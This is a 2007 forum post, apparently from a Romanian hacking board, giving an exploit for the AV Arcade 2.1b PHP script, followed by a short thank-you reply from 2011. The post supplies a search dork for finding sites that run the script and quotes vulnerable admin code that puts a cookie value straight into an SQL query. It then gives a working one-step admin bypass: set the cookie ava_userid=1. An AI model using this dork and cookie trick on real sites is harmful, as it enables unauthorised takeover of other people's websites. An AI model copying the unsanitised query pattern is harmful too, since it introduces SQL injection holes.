kw3rln Posted July 1, 2007 Report Posted July 1, 2007 AV Arcade 2.1b (COOKIE[ava_userid]) Get Admin RightsWeb: AV Arcade 2.1bSite : www.avscripts.netDork : "Powered By AV Arcade"Author: Kw3rLn [ teh_lost_byte[at]YaHoO[d0t]Com ]Romanian Security Team [Ethical Hacking] - hTTp://RSTZONE.nETVurnerable code: admin/index.php: $sql = mysql_query("SELECT * FROM ava_users WHERE id=".$_COOKIE['ava_userid'].""); while($row = mysql_fetch_array($sql)){ if ($row['admin'] == 1) { define( 'ADMIN_ACCESS', 1 ); [...]Exploit:Set in your cookies: ava_userid = 1; and that`s all GREETZ: all memberz of RST and milw0rm//kw3rln [ http://rstzone.net ][EOF] Quote
restik Posted August 9, 2011 Report Posted August 9, 2011 Multumesc chiar e un script bun pentru jocuri ! Quote